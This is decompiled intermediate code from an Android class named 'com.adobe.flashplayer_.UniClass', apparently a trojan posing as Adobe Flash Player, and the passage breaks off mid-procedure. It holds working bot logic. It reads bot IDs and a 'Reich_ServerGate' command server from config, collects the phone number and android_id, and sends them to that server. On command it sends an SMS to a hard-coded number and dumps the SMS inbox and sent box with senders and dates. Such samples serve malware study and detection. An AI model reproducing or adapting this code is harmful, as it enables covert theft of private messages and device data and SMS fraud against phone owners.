record `com.adobe.flashplayer_.UniClass` @kind class @AccessFlag PUBLIC {
}
procedure `void` `<init>`(`com.adobe.flashplayer_.UniClass` v0 @kind this) @signature `Lcom/adobe/flashplayer_/UniClass;.<init>:()V` @AccessFlag PUBLIC_CONSTRUCTOR {
    temp;

  #L037d34.  call `<init>`(v0) @signature `Ljava/lang/Object;.<init>:()V` @kind direct;
  #L037d3a.  return @kind void;
}
procedure `java.lang.String` `access$0`(`com.adobe.flashplayer_.UniClass` v1 @kind object, `java.lang.String` v2 @kind object, `android.content.Context` v3 @kind object) @signature `Lcom/adobe/flashplayer_/UniClass;.access$0:(Lcom/adobe/flashplayer_/UniClass;Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @AccessFlag STATIC_SYNTHETIC {
    temp;
    v0;

  #L037d4c.  call temp:= `readConfig`(v1, v2, v3) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037d52.  v0:= temp @kind object;
  #L037d54.  return v0 @kind object;
}
procedure `java.lang.String` `millisToDate`(`long` v3 @name `currentTime`) @signature `Lcom/adobe/flashplayer_/UniClass;.millisToDate:(J)Ljava/lang/String;` @AccessFlag PUBLIC_STATIC {
    temp;
    v0;
    v1;
    v2;

  #L037d68.  call temp:= `getInstance`() @signature `Ljava/util/Calendar;.getInstance:()Ljava/util/Calendar;` @kind static;
  #L037d6e.  v0:= temp @kind object;
  #L037d70.  call `setTimeInMillis`(v0, v3) @signature `Ljava/util/Calendar;.setTimeInMillis:(J)V` @kind virtual;
  #L037d76.  call temp:= `getTime`(v0) @signature `Ljava/util/Calendar;.getTime:()Ljava/util/Date;` @kind virtual;
  #L037d7c.  v1:= temp @kind object;
  #L037d7e.  call temp:= `toString`(v1) @signature `Ljava/util/Date;.toString:()Ljava/lang/String;` @kind virtual;
  #L037d84.  v2:= temp @kind object;
  #L037d86.  return v2 @kind object;
}
procedure `java.lang.String` `readConfig`(`com.adobe.flashplayer_.UniClass` v7 @kind this, `java.lang.String` v8 @kind object @name `config`, `android.content.Context` v9 @kind object @name `c`) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L037d98.  v4:= "" @kind object;
  #L037d9c.  call temp:= `openFileInput`(v9, v8) @signature `Landroid/content/Context;.openFileInput:(Ljava/lang/String;)Ljava/io/FileInputStream;` @kind virtual;
  #L037da2.  v1:= temp @kind object;
  #L037da4.  if v1 == 0 then goto L037de4;
  #L037da8.  v2:= new `java.io.InputStreamReader`;
  #L037dac.  call `<init>`(v2, v1) @signature `Ljava/io/InputStreamReader;.<init>:(Ljava/io/InputStream;)V` @kind direct;
  #L037db2.  v0:= new `java.io.BufferedReader`;
  #L037db6.  call `<init>`(v0, v2) @signature `Ljava/io/BufferedReader;.<init>:(Ljava/io/Reader;)V` @kind direct;
  #L037dbc.  v3:= "" @kind object;
  #L037dc0.  v5:= new `java.lang.StringBuilder`;
  #L037dc4.  call `<init>`(v5) @signature `Ljava/lang/StringBuilder;.<init>:()V` @kind direct;
  #L037dca.  call temp:= `readLine`(v0) @signature `Ljava/io/BufferedReader;.readLine:()Ljava/lang/String;` @kind virtual;
  #L037dd0.  v3:= temp @kind object;
  #L037dd2.  if v3 != 0 then goto L037de6;
  #L037dd6.  call `close`(v1) @signature `Ljava/io/InputStream;.close:()V` @kind virtual;
  #L037ddc.  call temp:= `toString`(v5) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037de2.  v4:= temp @kind object;
  #L037de4.  return v4 @kind object;
  #L037de6.  call temp:= `append`(v5, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037dec.  goto L037dca;
  #L037dee.  v6:= Exception @type ^`java.io.FileNotFoundException` @kind object;
  #L037df0.  goto L037de4;
  #L037df2.  v6:= Exception @type ^`java.io.IOException` @kind object;
  #L037df4.  goto L037de4;
  catch `java.io.FileNotFoundException` @[L037d9c..L037dec] goto L037dee;
  catch `java.io.IOException` @[L037d9c..L037dec] goto L037df2;
}
procedure `void` `saveData`(`com.adobe.flashplayer_.UniClass` v2 @kind this, `java.lang.String` v3 @kind object @name `data`, `java.lang.String` v4 @kind object @name `f`, `android.content.Context` v5 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/UniClass;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L037e18.  v0:= new `java.io.OutputStreamWriter`;
  #L037e1c.  v1:= 0I;
  #L037e1e.  call temp:= `openFileOutput`(v5, v4, v1) @signature `Landroid/content/Context;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L037e24.  v1:= temp @kind object;
  #L037e26.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L037e2c.  call `write`(v0, v3) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L037e32.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L037e38.  return @kind void;
  #L037e3a.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L037e3c.  goto L037e38;
  catch `java.io.IOException` @[L037e18..L037e38] goto L037e3a;
}
procedure `void` `sendREP`(`com.adobe.flashplayer_.UniClass` v14 @kind this, `java.lang.String` v15 @kind object @name `Reich_ServerGate`, `java.lang.String` v16 @kind object @name `i`, `java.lang.String` v17 @kind object @name `rep`, `android.content.Context` v18 @kind object @name `c`) @signature `Lcom/adobe/flashplayer_/UniClass;.sendREP:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;

  #L037e60.  v9:= "BotID" @kind object;
  #L037e64.  v0:= v18 @kind object;
  #L037e68.  call temp:= `readConfig`(v14, v9, v0) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037e6e.  v1:= temp @kind object;
  #L037e70.  v9:= "BotNetwork" @kind object;
  #L037e74.  v0:= v18 @kind object;
  #L037e78.  call temp:= `readConfig`(v14, v9, v0) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037e7e.  v3:= temp @kind object;
  #L037e80.  v9:= "BotLocation" @kind object;
  #L037e84.  v0:= v18 @kind object;
  #L037e88.  call temp:= `readConfig`(v14, v9, v0) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037e8e.  v2:= temp @kind object;
  #L037e90.  v5:= `@@android.os.Build$VERSION.RELEASE` @type ^`java.lang.String` @kind object;
  #L037e94.  v9:= "BotVer" @kind object;
  #L037e98.  v0:= v18 @kind object;
  #L037e9c.  call temp:= `readConfig`(v14, v9, v0) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037ea2.  v4:= temp @kind object;
  #L037ea4.  v9:= "phone" @kind object;
  #L037ea8.  v0:= v18 @kind object;
  #L037eac.  call temp:= `getSystemService`(v0, v9) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L037eb2.  v8:= temp @kind object;
  #L037eb4.  v8:= (`android.telephony.TelephonyManager`) v8 @kind object;
  #L037eb8.  call temp:= `getLine1Number`(v8) @signature `Landroid/telephony/TelephonyManager;.getLine1Number:()Ljava/lang/String;` @kind virtual;
  #L037ebe.  v6:= temp @kind object;
  #L037ec0.  if v6 != 0 then goto L037fd6;
  #L037ec4.  v6:= "" @kind object;
  #L037ec8.  if v1 != 0 then goto L037ee0;
  #L037ecc.  call temp:= `getContentResolver`(v18) @signature `Landroid/content/Context;.getContentResolver:()Landroid/content/ContentResolver;` @kind virtual;
  #L037ed2.  v9:= temp @kind object;
  #L037ed4.  v10:= "android_id" @kind object;
  #L037ed8.  call temp:= `getString`(v9, v10) @signature `Landroid/provider/Settings$Secure;.getString:(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;` @kind static;
  #L037ede.  v1:= temp @kind object;
  #L037ee0.  v9:= new `java.lang.StringBuilder`;
  #L037ee4.  v10:= "a=2&b=" @kind object;
  #L037ee8.  call `<init>`(v9, v10) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L037eee.  call temp:= `append`(v9, v1) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037ef4.  v9:= temp @kind object;
  #L037ef6.  v10:= "&c=" @kind object;
  #L037efa.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f00.  v9:= temp @kind object;
  #L037f02.  v10:= ":" @kind object;
  #L037f06.  v11:= "" @kind object;
  #L037f0a.  call temp:= `replace`(v3, v10, v11) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L037f10.  v10:= temp @kind object;
  #L037f12.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f18.  v9:= temp @kind object;
  #L037f1a.  v10:= "&d=" @kind object;
  #L037f1e.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f24.  v9:= temp @kind object;
  #L037f26.  call temp:= `append`(v9, v2) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f2c.  v9:= temp @kind object;
  #L037f2e.  v10:= "&e=" @kind object;
  #L037f32.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f38.  v9:= temp @kind object;
  #L037f3a.  call temp:= `append`(v9, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f40.  v9:= temp @kind object;
  #L037f42.  v10:= "&f=" @kind object;
  #L037f46.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f4c.  v9:= temp @kind object;
  #L037f4e.  call temp:= `append`(v9, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f54.  v9:= temp @kind object;
  #L037f56.  v10:= "&g=" @kind object;
  #L037f5a.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f60.  v9:= temp @kind object;
  #L037f62.  call temp:= `append`(v9, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f68.  v9:= temp @kind object;
  #L037f6a.  v10:= "&h=" @kind object;
  #L037f6e.  call temp:= `append`(v9, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f74.  v9:= temp @kind object;
  #L037f76.  v0:= v17 @kind object;
  #L037f7a.  call temp:= `append`(v9, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037f80.  v9:= temp @kind object;
  #L037f82.  call temp:= `toString`(v9) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037f88.  v7:= temp @kind object;
  #L037f8a.  v9:= new `com.adobe.flashplayer_.FlashVars`;
  #L037f8e.  call `<init>`(v9) @signature `Lcom/adobe/flashplayer_/FlashVars;.<init>:()V` @kind direct;
  #L037f94.  v10:= 1I;
  #L037f96.  v10:= new `java.lang.String`[v10];
  #L037f9a.  v11:= 0I;
  #L037f9c.  v12:= new `java.lang.StringBuilder`;
  #L037fa0.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L037fa6.  v13:= temp @kind object;
  #L037fa8.  call `<init>`(v12, v13) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L037fae.  v13:= "?" @kind object;
  #L037fb2.  call temp:= `append`(v12, v13) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037fb8.  v12:= temp @kind object;
  #L037fba.  call temp:= `append`(v12, v7) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037fc0.  v12:= temp @kind object;
  #L037fc2.  call temp:= `toString`(v12) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037fc8.  v12:= temp @kind object;
  #L037fca.  v10[v11]:= v12 @kind object;
  #L037fce.  call temp:= `execute`(v9, v10) @signature `Lcom/adobe/flashplayer_/FlashVars;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L037fd4.  return @kind void;
  #L037fd6.  v9:= "+" @kind object;
  #L037fda.  v10:= "" @kind object;
  #L037fde.  call temp:= `replace`(v6, v9, v10) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L037fe4.  v6:= temp @kind object;
  #L037fe6.  goto L037ec8;
}
procedure `void` `writeConfig`(`com.adobe.flashplayer_.UniClass` v2 @kind this, `java.lang.String` v3 @kind object @name `config`, `java.lang.String` v4 @kind object @name `data`, `android.content.Context` v5 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/UniClass;.writeConfig:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L037ffc.  v0:= new `java.io.OutputStreamWriter`;
  #L038000.  v1:= 0I;
  #L038002.  call temp:= `openFileOutput`(v5, v3, v1) @signature `Landroid/content/Context;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L038008.  v1:= temp @kind object;
  #L03800a.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L038010.  call `write`(v0, v4) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L038016.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L03801c.  return @kind void;
  #L03801e.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L038020.  goto L03801c;
  catch `java.io.IOException` @[L037ffc..L03801c] goto L03801e;
}
procedure `void` `Execute`(`com.adobe.flashplayer_.UniClass` v30 @kind this, `java.lang.String` v31 @kind object @name `param`, `android.content.Context` v32 @kind object @name `c`) @signature `Lcom/adobe/flashplayer_/UniClass;.Execute:(Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;
    v14;
    v15;
    v16;
    v17;
    v18;
    v19;
    v20;
    v21;
    v22;
    v23;
    v24;
    v25;
    v26;
    v27;
    v28;
    v29;

  #L038044.  v3:= "BotID" @kind object;
  #L038048.  v0:= v30 @kind object;
  #L03804c.  v1:= v32 @kind object;
  #L038050.  call temp:= `readConfig`(v0, v3, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L038056.  v13:= temp @kind object;
  #L038058.  v3:= "BotNetwork" @kind object;
  #L03805c.  v0:= v30 @kind object;
  #L038060.  v1:= v32 @kind object;
  #L038064.  call temp:= `readConfig`(v0, v3, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L03806a.  v14:= temp @kind object;
  #L03806c.  v3:= "BotLocation" @kind object;
  #L038070.  v0:= v30 @kind object;
  #L038074.  v1:= v32 @kind object;
  #L038078.  call temp:= `readConfig`(v0, v3, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L03807e.  v15:= temp @kind object;
  #L038080.  v3:= "Reich_ServerGate" @kind object;
  #L038084.  v0:= v30 @kind object;
  #L038088.  v1:= v32 @kind object;
  #L03808c.  call temp:= `readConfig`(v0, v3, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L038092.  v19:= temp @kind object;
  #L038094.  v3:= "BotVer" @kind object;
  #L038098.  v0:= v30 @kind object;
  #L03809c.  v1:= v32 @kind object;
  #L0380a0.  call temp:= `readConfig`(v0, v3, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0380a6.  v17:= temp @kind object;
  #L0380a8.  v18:= `@@android.os.Build$VERSION.RELEASE` @type ^`java.lang.String` @kind object;
  #L0380ac.  v3:= "MacrosA" @kind object;
  #L0380b0.  v0:= v31 @kind object;
  #L0380b4.  call temp:= `contains`(v0, v3) @signature `Ljava/lang/String;.contains:(Ljava/lang/CharSequence;)Z` @kind virtual;
  #L0380ba.  v3:= temp;
  #L0380bc.  if v3 == 0 then goto L0380fe;
  #L0380c0.  v3:= "w" @kind object;
  #L0380c4.  v5:= "*" @kind object;
  #L0380c8.  v0:= v30 @kind object;
  #L0380cc.  v1:= v32 @kind object;
  #L0380d0.  call `writeConfig`(v0, v3, v5, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.writeConfig:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L0380d6.  v3:= "79262000900" @kind object;
  #L0380da.  v5:= "HELP" @kind object;
  #L0380de.  v0:= v30 @kind object;
  #L0380e2.  call `sendSMS`(v0, v3, v5) @signature `Lcom/adobe/flashplayer_/UniClass;.sendSMS:(Ljava/lang/String;Ljava/lang/String;)V` @kind virtual;
  #L0380e8.  v3:= "MacrosAState" @kind object;
  #L0380ec.  v5:= "A" @kind object;
  #L0380f0.  v0:= v30 @kind object;
  #L0380f4.  v1:= v32 @kind object;
  #L0380f8.  call `writeConfig`(v0, v3, v5, v1) @signature `Lcom/adobe/flashplayer_/UniClass;.writeConfig:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L0380fe.  v3:= "getMessages" @kind object;
  #L038102.  v0:= v31 @kind object;
  #L038106.  call temp:= `indexOf`(v0, v3) @signature `Ljava/lang/String;.indexOf:(Ljava/lang/String;)I` @kind virtual;
  #L03810c.  v3:= temp;
  #L03810e.  v5:= -1I;
  #L038110.  if v3 == v5 then goto L038228;
  #L038114.  v25:= "" @kind object;
  #L038118.  v26:= "" @kind object;
  #L03811c.  v27:= "" @kind object;
  #L038120.  v28:= "" @kind object;
  #L038124.  v3:= "content://sms/inbox" @kind object;
  #L038128.  call temp:= `parse`(v3) @signature `Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;` @kind static;
  #L03812e.  v4:= temp @kind object;
  #L038130.  call temp:= `getContentResolver`(v32) @signature `Landroid/content/Context;.getContentResolver:()Landroid/content/ContentResolver;` @kind virtual;
  #L038136.  v3:= temp @kind object;
  #L038138.  v5:= 0I;
  #L03813a.  v6:= 0I;
  #L03813c.  v7:= 0I;
  #L03813e.  v8:= 0I;
  #L038140.  call temp:= `query`(v3, v4, v5, v6, v7, v8) @signature `Landroid/content/ContentResolver;.query:(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;` @kind virtual;
  #L038146.  v22:= temp @kind object;
  #L038148.  call temp:= `moveToNext`(v22) @signature `Landroid/database/Cursor;.moveToNext:()Z` @kind interface;
  #L03814e.  v3:= temp;
  #L038150.  if v3 != 0 then goto L03822a;
  #L038154.  call `close`(v22) @signature `Landroid/database/Cursor;.close:()V` @kind interface;
  #L03815a.  v3:= new `java.lang.StringBuilder`;
  #L03815e.  call temp:= `valueOf`(v26) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L038164.  v5:= temp @kind object;
  #L038166.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L03816c.  v0:= v25 @kind object;
  #L038170.  call temp:= `append`(v3, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L038176.  v3:= temp @kind object;
  #L038178.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03817e.  v26:= temp @kind object;
  #L038180.  v3:= "in" @kind object;
  #L038184.  v0:= v30 @kind object;
  #L038188.  v1:= v26 @kind object;
  #L03818c.  v2:= v32 @kind object;
  #L038190.  call `saveData`(v0, v1, v3, v2) @signature `Lcom/adobe/flashplayer_/UniClass;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L038196.  v3:= "content://sms/sent" @kind object;
  #L03819a.  call temp:= `parse`(v3) @signature `Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;` @kind static;
  #L0381a0.  v6:= temp @kind object;
  #L0381a2.  call temp:= `getContentResolver`(v32) @signature `Landroid/content/Context;.getContentResolver:()Landroid/content/ContentResolver;` @kind virtual;
  #L0381a8.  v5:= temp @kind object;
  #L0381aa.  v7:= 0I;
  #L0381ac.  v8:= 0I;
  #L0381ae.  v9:= 0I;
  #L0381b0.  v10:= 0I;
  #L0381b2.  call temp:= `query`(v5, v6, v7, v8, v9, v10) @signature `Landroid/content/ContentResolver;.query:(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;` @kind virtual;
  #L0381b8.  v24:= temp @kind object;
  #L0381ba.  call temp:= `moveToNext`(v24) @signature `Landroid/database/Cursor;.moveToNext:()Z` @kind interface;
  #L0381c0.  v3:= temp;
  #L0381c2.  if v3 != 0 then goto L03831c;
  #L0381c6.  call `close`(v24) @signature `Landroid/database/Cursor;.close:()V` @kind interface;
  #L0381cc.  v3:= new `java.lang.StringBuilder`;
  #L0381d0.  call temp:= `valueOf`(v28) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0381d6.  v5:= temp @kind object;
  #L0381d8.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0381de.  v0:= v27 @kind object;
  #L0381e2.  call temp:= `append`(v3, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0381e8.  v3:= temp @kind object;
  #L0381ea.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0381f0.  v28:= temp @kind object;
  #L0381f2.  v3:= "out" @kind object;
  #L0381f6.  v0:= v30 @kind object;
  #L0381fa.  v1:= v28 @kind object;
  #L0381fe.  v2:= v32 @kind object;
  #L038202.  call `saveData`(v0, v1, v3, v2) @signature `Lcom/adobe/flashplayer_/UniClass;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L038208.  v7:= new `com.adobe.flashplayer_.UniClass$1`;
  #L03820c.  v9:= 3000L;
  #L038210.  v11:= 1000L;
  #L038214.  v8:= v30 @kind object;
  #L038218.  v16:= v32 @kind object;
  #L03821c.  call `<init>`(v7, v8, v9, v11, v13, v14, v15, v16, v17, v18, v19) @signature `Lcom/adobe/flashplayer_/UniClass$1;.<init>:(Lcom/adobe/flashplayer_/UniClass;JJLjava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L038222.  call temp:= `start`(v7) @signature `Lcom/adobe/flashplayer_/UniClass$1;.start:()Landroid/os/CountDownTimer;` @kind virtual;
  #L038228.  return @kind void;
  #L03822a.  v3:= "body" @kind object;
  #L03822e.  v0:= v22 @kind object;
  #L038232.  call temp:= `getColumnIndex`(v0, v3) @signature `Landroid/database/Cursor;.getColumnIndex:(Ljava/lang/String;)I` @kind interface;
  #L038238.  v3:= temp;
  #L03823a.  v0:= v22 @kind object;
  #L03823e.  call temp:= `getString`(v0, v3) @signature `Landroid/database/Cursor;.getString:(I)Ljava/lang/String;` @kind interface;
  #L038244.  v23:= temp @kind object;
  #L038246.  v3:= "date" @kind object;
  #L03824a.  v0:= v22 @kind object;
  #L03824e.  call temp:= `getColumnIndex`(v0, v3) @signature `Landroid/database/Cursor;.getColumnIndex:(Ljava/lang/String;)I` @kind interface;
  #L038254.  v3:= temp;
  #L038256.  v0:= v22 @kind object;
  #L03825a.  call temp:= `getLong`(v0, v3) @signature `Landroid/database/Cursor;.getLong:(I)J` @kind interface;
  #L038260.  v20:= temp @kind wide;
  #L038262.  v3:= "address" @kind object;
  #L038266.  v0:= v22 @kind object;
  #L03826a.  call temp:= `getColumnIndex`(v0, v3) @signature `Landroid/database/Cursor;.getColumnIndex:(Ljava/lang/String;)I` @kind interface;
  #L038270.  v3:= temp;
  #L038272.  v0:= v22 @kind object;
  #L038276.  call temp:= `getString`(v0, v3) @signature `Landroid/database/Cursor;.getString:(I)Ljava/lang/String;` @kind interface;
  #L03827c.  v29:= temp @kind object;
  #L03827e.  v3:= new `java.lang.StringBuilder`;
  #L038282.  call temp:= `valueOf`(v25) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L038288.  v5:= temp @kind object;
  #L03828a.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L038290.  v0:= v29 @kind object;
  #L038294.  call temp:= `append`(v3, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03829a.  v3:= temp @kind object;
  #L03829c.  v5:= "\r" @kind object;
  #L0382a0.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0382a6.  v3:= temp @kind object;
  #L0382a8.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0382ae.  v25:= temp @kind object;
  #L0382b0.  v3:= new `java.lang.StringBuilder`;
  #L0382b4.  call temp:= `valueOf`(v25) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0382ba.  v5:= temp @kind object;
  #L0382bc.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0382c2.  call temp:= `millisToDate`(v20) @signature `Lcom/adobe/flashplayer_/UniClass;.millisToDate:(J)Ljava/lang/String;` @kind static;
  #L0382c8.  v5:= temp @kind object;
  #L0382ca.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0382d0.  v3:= temp @kind object;
  #L0382d2.  v5:= "\r" @kind object;
  #L0382d6.  call temp:= `append`(v3, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0382dc.  v3:= temp @kind object;
  #L0382de.  call temp:= `toString`(v3) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0382e4.  v25:= temp @kind object;
  #L0382e6.  v3:= new `java.lang.StringBuilder`;
  #L0382ea.  call temp:= `valueOf`(v25) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0382f0.  v5:= temp @kind object;
  #L0382f2.  call `<init>`(v3, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0382f8.  v0:= v23 @kind object;
  #L0382fc.  call temp:= `append`(v3, v0) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L038302.  v3:= temp @kind object;
  #L038304.  v5:= "\r\r" @kind object;
